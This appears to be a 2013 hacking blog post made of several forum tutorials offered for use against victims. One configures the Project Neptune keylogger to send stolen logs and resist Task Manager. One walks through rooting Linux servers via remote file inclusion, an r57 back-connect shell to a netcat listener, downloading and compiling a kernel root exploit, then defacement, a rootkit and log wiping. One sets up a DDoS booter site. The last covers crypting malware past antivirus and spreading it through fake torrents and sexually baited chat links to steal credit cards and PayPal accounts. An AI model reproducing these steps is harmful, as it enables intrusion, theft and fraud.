Tuesday, September 24, 2013

Guys!!!!!! so lets try something old in a new way :)

Now that that's out of the way, to the tutorial!

- Download Information -
Download link: http://www.project-neptune.net/download/

What exactly makes this keylogger so special?
Simply put, it is one of the most stable, well put together, and all around well written loggers around. It pays attention to the minor details and offers plenty of features.

- Tutorial -

Step One - Downloading
First off, make sure you go to the link above to download it. You will need WinRar to extract it.
After you have downloaded Project Neptune, simply drag and drop the folder containing all the files to your desktop, like shown:

[Image: 66944008.png]
Step Two - Setting Up Log Storing
First off, you have to decide what you want to use to store logs. For email, I recommend using Gmail, and you can make an account for that here:https://www.google.com/accounts/NewAccount?service=mail

This tutorial will be using Email, specifically Gmail, but if you want to use FTP, using DriveHQ, it's free and allows a lot of storage: http://www.drivehq.com/secure/FreeSignup.aspx

After you are done making your Gmail account, take a look at the picture below:

[Image: 48011075.png]
Step Three - Setting Up System Settings
There isn't much to do on this tab, but I'll give a small explanation on what it all does:

[Image: 17353496.png]

Number 1 - These options simply disable taskmanager's ability to end your server's process. If you activate any, choose the last one, it has the smallest suspicion level!

Number 2 - This is for blocking websites, but be weary, because it requires admin rights and will crash if it doesn't have it. Right click on the box to add sites.

Number 3 - All of these options are self explanatory, but be warned: they require admin rights and will cause the server to crash if the client doesn't have admin rights. Mouse over them for more information.
Step Four - Installation Settings

This tab is for setting up how your keylogger gets installed on your client. You need to melt your file so that it won't get tampered with after it is ran. This is just a safety feature if you'll be infecting intelligent people, but I always use it!

[Image: 61051854.png]
Step Five - Extra Options

These are all of those extra options that just make it more exciting. Use the Fake Error Message if you don't want to bind it to something/crypt it.

[Image: 83361732.png]
Step Six - Server Generation
This is the last step!

Click on the "Server Generation" tab and go ahead and copy down the Uninstall password - you'll need this if you ever test PN out on your computer. After that, go ahead and hit "Generate New Server" and you're set to go!

Now that you are done, your server file should be generated if everything went ok. If you have any questions, feel free to ask.

Protip: Click on the next tab and hit "Save Settings" so that you don't have to enter all of this every time you use it!
You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57, or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)
The purpose of this tutorial is to give a very general picture in process of Rooting
a Linux Server with Safe Mod: OFF.
Suppose that we have found a site with R.F.I. vulnerability:
We can run shell exploiting Remote File Inclusion, as follows:
The “yourshell.txt” will be your remote shell.. The reason why we add a “?” at the end of the “.txt” is so the server will read it as a PHP File.. and not a normal text file.
After we enter in the shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname – a in Command line.
To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.
We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder
In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).
Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:
We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.
We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:
cd C:\Program Files\Netcat
And we type the following command:
nc -n -l -v -p 11457
NetCat respond: listening on [any] 11457 …
In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (My IP is – Quick and Easy way to SEE my IP address – CmyIP.com to see our ip if
we have dynamic)
In the Port form we will put the port that we opened and NetCat listens.
If we press connect the shell will respond:
Now script try connect to port 11457 …
If our settings are correct NetCat will give us a shell to the server
Now we wil continue to the Rooting proccess.
We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don’t have the correct permissions.
List of the exploits/kernel:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.
Some sites that we can find Local Root Exploits:
http://www.milw0rm (Try Search: “linux kernel”)
Other sites: .:[ packet storm ]:. – http://packetstormsecurity.org/ | arblan.com – arb lan Resources and Information.
or try Googlin’ you can find ‘em all 
We can find writable folders/files by typing:
find / -perm -2 -ls
We can use the /tmp folder which is a standard writable folder
We type: cd /tmp
To download the local root exploit we can use a download command for linux like
For example:
wget arblan.com – arb lan Resources and Information.
where arblan.com – arb lan Resources and Information. is the url of h00lyshit.
After the download we must compile the exploit (Read the instruction of the exploit
before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
Now we have created the executable file: h00lyshit.
The command to run this exploit is:
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
We must wait 2-3 minutes for the file creation
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.
Congratulations, You’ve got root!
This tutorial will teach you how to maintain and create your own stresser, otherwise known as a booter. I have another tutorial on this. This tutorial is updated, more detailed, and gives an even better source. Please leave feedback, or questions, or even if you think I should add something in, please don't hesitate.

[Image: jW2mxjejiQxR6.png]

1. Introduction (Sector 1)
2. Uploading Your Files (Sector 1)
3. Uploading and Configuring MySQL Databases (Sector 1)
4. Mandatory File Edits (Sector 1)
5. Configuring PhpMyAdmin (Sector 2)
6. Accounts (Sector 3)
7. Creating An Account (Sector 3)
8. Activating Your Account and Making Yourself an Administrator (Sector 3
9. Accessing the Administrator Control Panel (Sector 3)
10. Sells/APi's (Sector 4)

[Image: j3Kqy0dUN0MNg.png]

So. You may be this far, but you may not know what a stresser, or "booter" even is. A stresser uses shells or api's to attack a certain location. These will send a certain amount of packets to the desired location, and if it sends enough packets it will force the server, or connection to flood, and simply crash. When a router, or connection/network crashes, that server cannot handle the amount of incoming packets.

[Image: jLVyWBEP1gdZK.png]

JeeJee Power v1.0 Source:


Shell Checker:


Introduction (Sector 1):

Note: Please note I have spoilered image to have bandwidth. Click view spoiler to view tutorial related images! Thank you. -Natha.

Welcome to Sector One of this tutorial. In this stage I will be teaching you the following:

  • How to setup your hosting.
  • How to upload and configure your stresser.

Uploading Your Files (Sector 1):

1. For tutorial purposes I'm simply going to use a hosting website called http://000webhosting.com/ I would not advise using this website, you will not be able to send attacks. They have fsock disabled. As I said, this site is just for tutorial purposes. I would advise getting cheap hosting here at HackForums in the hosting marketplace.

Once you have your hosting, you will want to upload your files that you originally downloaded above. ONLY upload the files within the source folder included in the download. There is no point uploading the banner .PSD etc.

To upload your files download filezilla at http://www.filezilla-project.org/ or use the file manager in your hosting's cPanel.

Uploading and Configuring MySQL Databases (Sector 1):

Once you have your files uploaded. Go into your cPanel and create a MySQL database.

The majority of hosts, if not all will all come with MySQL installed.

Create your database. Remember the information used. 

After your database has been created, we now want to edit three files. The three files are below:

Mandatory File Edits (Sector 1):

We need to edit the files so our stresser can connect to the MySQL Database.

  • dbc.php
  • shellcounter.php
  • includes/ezSQL.php ( line 44, 71 and 101 )


This is self explanatory. At the top you will see the lines below. The lines below explain exactly what to edit. Edit the information within the ' 's. Like I have done below.

PHP Code:
define ("DB_HOST""mysql9.000webhost.com"); // set database hostdefine ("DB_USER""a9162705_xx"); // set database userdefine ("DB_PASS","Example1"); // set database passworddefine ("DB_NAME","a9162705_xx"); // set database name 

Line 1: This is your database host.
Line 2: This is your database username.
Line 3: This is your database password.
Line 4: This is your database name.

If you haven't caught on by now. You need to input all of your MySQL information into those fields. 


The top of shellcounter.php will look like this:

PHP Code:
/* START OF CONFIGURATION SECTION */$mysql_username 'a9162705_xx';    // MySQL User Name$mysql_password 'Example1';  // MySQL Password$mysql_hostname 'mysql9.000webhost.com';    // MySQL Host Name$mysql_hostport 3306;  // MySQL Host Port$mysql_database 'a9162705_xx';    // MySQL Database$mysql_shelltbl 'shellpool';    // MySQL Table Name (will be created if it does not exist)$mysql_stengine 'MyISAM';    // Preferred MySQL Storage Engine (MyISAM, MRG_MyISAM or InnoDB) 

You will only need to edit the following with your MySQL Database Information:

PHP Code:
$mysql_username 'a9162705_xx';    // MySQL User Namemysql_password 'Example1';  // MySQL Password$mysql_hostname 'mysql9.000webhost.com';    // MySQL Host Name$mysql_database 'a9162705_xx';    // MySQL Database 

LEAVE everything else as is. Ports for example, leave them. They're fine.


I would recommend getting Notepad++. Download it at, http://notepad-plus-plus.org/ to navigate line numbers easier. Read above for the lines that need to be edited.

Line 44:

Edit the obvious fields. I've inputted my database information.

PHP Code:
function ezSQL_mysql($dbuser='a9162705_xx'$dbpassword='Example1'$dbname='a9162705_xx'$dbhost='mysql9.000webhost.com'

Line 71:

Once again, edit the obvious fields. Look at the $values. It explains it clearly. $dbuser is the database username, and so on. Common sense.

PHP Code:
        function connect($dbuser='a9162705_xx'$dbpassword='Example1'$dbhost='mysql9.000webhost.com'

Line 101:

Finally for a short one, line 101, just the database name.

PHP Code:
        function select($dbname='a9162705_xx'

Configuring PhpMyAdmin (Sector 2):

Welcome to Sector 2 of this tutorial. This will teach you how to configure your PhpMyAdmin with your stresser source. Please don't over think this. It may seem overwhelming, but it's incredibly simple.

Your cPanel should have PhpMyAdmin. 

Locate the import button located at the top of PhpMyAdmin:

[Image: ibnSppRtGxLUlX.png]

Once you're in the import menu. Upload the provided .SQL file in the JeeJee Power folder. Like below:

[Image: ibzIoagF1p74n6.png]

Then after click "Go" like provided below.

[Image: iRWQMzyV6Y1I9.png]

Then you should get a success message, and the databases should appear on the side.

Accounts (Sector 3):

Welcome to Sector 3 of this tutorial! In this sector we will be learning how to register our account, activate it, and then proceed to give our self administrator rights, and access to the AdminCP.

You will want to locate YOURDOMAIN.com/login.php (Of course replace YOURDOMAIN with your actual domain, as this is just an example).

Creating An Account (Sector 3):

You will now be at the login page like below. (IF you get a MySQL error, you have input your MySQL details to the edited pages incorrectly).

[Image: ifPxE7PWOumN4.png]

Click the register button, and register your account.

[Image: i7W9kRZto6bPu.png]

Now your account is registered! Congratulations.

We're not done yet!

[Image: iCub0oXuOHsKI.png]

Activating Your Account and Making Yourself an Administrator (Sector 3):

Now go back to PhpMyAdmin.

Click the table called 'Users' on the side and then click Browse button at the top, just like when you clicked import. 

[Image: itDujnSFYjH1c.png]

You should see your own profile:

[Image: 1VKOC]

You want to click edit, which is of course the little pencil button. 

You need to change the values. Change the user_level value to 5. This will make an you administrator. Then you want to change the approved value from 0 to 1 to approve your account. 

Congratulations, your account is now active, and you're an administrator!

[Image: iYeDbww90WtHe.png]

Accessing the Administrator Control Panel (Sector 3):

To go to the administrator's control panel go to YOURDOMAIN.com/admin.php (Obviously replace YOURDOMAIN.com with your own once again).

From here you can change your booters name, add shells, post new bulletins, read logs, create users, active users and more!

Shells/APi's (Sector 4):

Ok. So you're finished, you want to get going right? Right. Unfortunately, this is the hard part. Well, easy but then again frustrating and can be time consuming. 

You need shells or APi's for your booter/stresser to work
Welcome to a Beginner's Guide to Keyloggers! In this guide I will go through all the common topics that you may need to know. When you finish reading this topic you will know everything you will ever need to get started keylogging. I cover every topic related to keyloggers as well as cover terminology and definitions. I'll explain how a keylogger works and how to even get started making your own! So let's get started!

What we will be going over:
 What is a keylogger?
 Learning the lingo and definitions.
 Common features keyloggers have.
 How do I use a keylogger?
 What is a "stub"?
 What is the "server"?
 What is crypting?
✪ What is the difference between a stealer and a keylogger?
 What is .net framework and why do I care?
 What are some good keyloggers?
 What are some upsides to keyloggers?
 What are some downsides to keyloggers?
 I want to make my own keylogger. Where do I start?
 How to spread your keylogger
✪ Conclusion

What is a keylogger?:
A keylogger is a program that logs a keyboards keystrokes. It can be used for several purposes, both black hat and white hat. The most common use is black hat. A keylogger functions by grabbing a keystroke, triggered by when the slave presses a key on their keyboard, and saving it to a variable. This process is called "keyboard hooking". It then will take this long variable and send it via a SMTP or FTP server. You can then view these logs and use it for whatever your intention may be. Keyloggers have several different features that I will go into in a later section. The most basic ones only include keyboard hooking and a way to send the logs.

One of the most confusing things about starting something new is not understanding the lingo. If you don't understand the lingo, how will you know what people are talking about? In this section I'll be explaining the common terms people use concerning keyloggers. I'll be going over some other more general things as well.

The Lingo
Slang term for keylogger. See the "What is a keylogger" section.
Slang term for keyboard hooks. These are also explained in the "What is a keylogger section"
Section of code that is triggered when the slave types something on the keyboard.
Compilation of all the keystrokes over a period of time.
A webhost that stores files that allows the user to connect and retrieve said files. Files in this case are logs.
A way that logs are sent via email. Example, MSN, Gmail, Yahoo, etc.
Full Un-Detected. This means that antiviruses will not detect your file as a virus. This will be further explained in the "What is crypting section".
UD:Undetected. This means that some antiviruses will not detect your files as a virus, while others will.
A server is the output of your keylogger. I will take this in-depth in the "What is a server?" section.
A crypter crypts your file removing detections. I'll take this in-depth in the "What is crypting" section.
A detection is a term used when an antivirus detects, or thinks your file is a virus. You always want to have the least amount of detections possible to increase your success rate and to reduce errors.
Black hat:
A black hat is someone who uses their knowledge of computers and security for malicious reasons.
White hat:
A white hat is someone who uses their knowledge of computers and security for helpful reasons. They help disinfect and improve others security to combat black hat hackers.
Grey hat:
A grey hat is a mixture between a black and white hat. They will infect innocent people and then help them get rid of it, for free or a price (the latter being more common).
When a file is backdoored it has a virus binded to it. This means that the file will act normally and the user will be infected without their knowledge. This has become extremely common in the keylogger section. Always be wary of new releases.

Common features of a keylogger
Icon Changers:
This will change your viruses icon without corrupting it like some third party programs can do.
MuteX is a unique string that you generate. It helps prevent multiple logs from being sent.
Add to Startup:
This will add a registry (or other ways) that will cause your virus to start when the computer is turned on.
Antis are a feature that help keep your virus on the slaves computer for as long as possible. They disable or stop certain white hat programs such as antiviruses, sandboxie, and keyscramblers from running or removing your file.
Disable CMD/Taskmanager/Registry:
This feature will change the registry value for each of these system tools to disable them.
Logging interval:
This allows the user to chose how often logs are sent.
Fake Error Message:
This will cause a fake error message to pop up, making it seem less suspicious.
File pumper:
This will add to the size of your virus. This helps making it seem less suspicious as a game won't be a few kilobytes.
Assembly Editing:
This allows you to change things found in the properties menu when right clicking a file. This helps it seem more like a real file rather than a virus.
Encrypted user information:
This encrtyps your information so that others cannot steal it by decompiling your virus.
Test connection:
This will test your credentials that you've entered to make sure they are correct.

How to use a keylogger:
Using a keylogger is a lot easier than it sounds. All you need to do is find one that you want to use, download it, and then chose your settings. Once you have entered all your information and chosen your settings, click the build button. The builder will create your server. This is what you give to people. Give them this file and when they run it they will be infected and you will start receiving logs. Pretty self explanitory. If you ever have a question contact the creator and they should be able to help you.

What is a Stub?
A stub is a separate binary that contains special code that is required for the keylogger to function. There are usually two things in a keylogger. The builder and the stub. Some keyloggers will have a stub built in. A builder takes the information and settings you've chosen and merges it with a stub. The stub contains keyhooks and the workings of each feature. These two merge to create your virus, containing all of the information. I'll cover this file in the next section.

What is a server?
A server is the ouptput of your keylogging builder. It takes your user information (the builder) and the actual malicious code (the stub) and merges the two (via either CodeDOM which I'll explain later in this section, or by filesplitting, which I will also cover) to make one bad ass file. There are several ways that this is accomplished, and both ways have their ups and downs. The server is also what you distribute to infect people. It is your "virus"

CodeDom is a type of building that generates the code during runtime. This allows the user to only have to download one file (just a builder). After inputting your information, the builder will take this and combine it with the malicious code (already inside the builder). This helps lower detection rates, but overall is harder to do, and is harder to reFUD (you have to re distribute the entire builder, instead of just providing another stub).

Filesplitting is the old school way to do things. It requries taking your information (the builder) and combining it with a separate file that contains the malicious code. While this makes it easier to detect, it's easier to update as you can simply give your users another file (same thing, just with less detections).

Crypting can be very complex, though it isn't necessary for you to know all of this information. So for this section I'll keep things to what you need to know. Crypting involves taking a stub (sometimes it's CodeDOM) and using that to FUD (or lower your detection rate) your file. The entire process can get a bit confusing, and I won't bother getting into it. What you do need to know is that crypting can easily corrupt your keylogging sever making it no longer work. A corrupt keylogger may not be detected (the crypter at least did it's job) but it will not send logs making it useless. Because of this you should chose your crypters carefully and it may take a while to find one that works (for free) with your keylogging server. If you are buying a crypter (which I recommend) then be sure to ask the seller to either test or verify your server. In short, crypting is used to lower detection rate, and raise execution rates. That's all you need to know.

Stealers vs Keyloggers
There is one major defining difference between a stealer and a keylogger. A stealers purposes is to steal passwords that have been saved in the browser/application. Ever logged into something and your browser prompted you to save the password? This is what stealers steal. They are good for massivley grabbing passwords and quickly. Once run they do not continue to steal until run again.

.Net Framework is a very in-depth concept from Microsoft. While you don't need to know (or should you really care) you should know that most keyloggers are written in Visual Basic .Net, giving it a dependancies. Depending on who made it (whether they suck or not) you may have to install a specific version (.Net 4.0). Most computers (99%) come with .Net 2.0 installed. Your output will also requrie a specific framework (depending on which one you use).

Some keyloggers:
This is like asking what your favorite ice cream flavor is! There is no "correct" answer. It's best to go and figure things out for
yourself. Being spoon fed information doesn't help you grow intellectually. Figure out which keylogger you like the best, and fits your needs.

Paid keyloggers:
Limitless Logger
Legacy Log

Free keyloggers:
Limitless Logger Lite
Dracula Logger
Unknown Logger

Advantages of Keyloggers
Keyloggers are great for having massive amounts of slaves. They will constantly send you their info and passwords without you having to do anything. They are more stable that other types of malware and are easier to write. They are also extremeley beginner friendly, and that is why they are so popular.

Downsides to Keyloggers
There's one major downside to keyloggers. Well two, but the second is a downside for all types of malware. The first is that (most) keyloggers don't allow you to have any control once you've infected your slave. You have no control, you can't stop logs, you can't do anything really. Keyloggers are starting to add in remote logging and this is slowly growing to be more and more advanced. The second downside is the .Net dependancy for most keyloggers. This is actually a downside for a lot of malware.

Where do I start to make my own Keylogger?
Well, aren't you ambitious!? It's great that you want to learn, but please...please do not copy and paste public source! Actually learn it for yourself! Once you've done that and made one, don't release it unless it's actually advanced/totally yours. There are plenty of ones on the market. Anyway, to learn how to make a keylogger, you'll need to figure out what language. For beginners I recommend Visual Basic .Net. Learn about SMTP mailing, and keyboard hooks. Then learn about filesplitting. There are plenty of guides on this forum, just search around!

Spreading is self explanatory, its spreading your keylogger around so you get more slaves. There is multiple ways you can spread your keylogger. Below are some good ways.

Chat Rooms - This is slow but you get adult people ( You can get credit cards and paypals from this). First of all , go to any chat room from any of these below:


And then , upload your file to any free file hosting such as sharesend and then go to chat rooms , and start spamming "16/F/uk huge boobs wanna see my naked pics ? go here <insert link> and tell me if u like it!!

Torrents - This is the most effective way. First you need a torrent client, I use uTorrent, because it's the easiest.Once you get your torrent client, Get some fake stuff , like Steam games Keygen or Cracks or w/e and then put them in a .rar file and put the RAT on it. (BIND IT) . Now you gotta create the torrents.Open uTorrent , and then go to File -> Create New Torrent And add your .rar file on it, okay so now trackers are needed... These are some good ones:


Then click START SEEDING. Now .. CLick Create -> Save AS... and save anywhere u want 
After you saved , go to http://www.#.org, Register and upload your torrent


Well, this tutorial was a lot longer than I anticipated, it covers everything you could possibly need to know about keylogging. Hopefully this will help some people out and will reduce the amount of pointless threads in this section. If this tutorial helped you, please post what you thought of it! If you have a suggestion, feel free to  post here!

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Form Grabber Released Works With IE,CROME and FIREFOX ,Unicode support [ 14-02-2016]

Hello guys! here i am releasing My form grabber Today, i have been coding this for oven 6 months and finally its time for public sales.....


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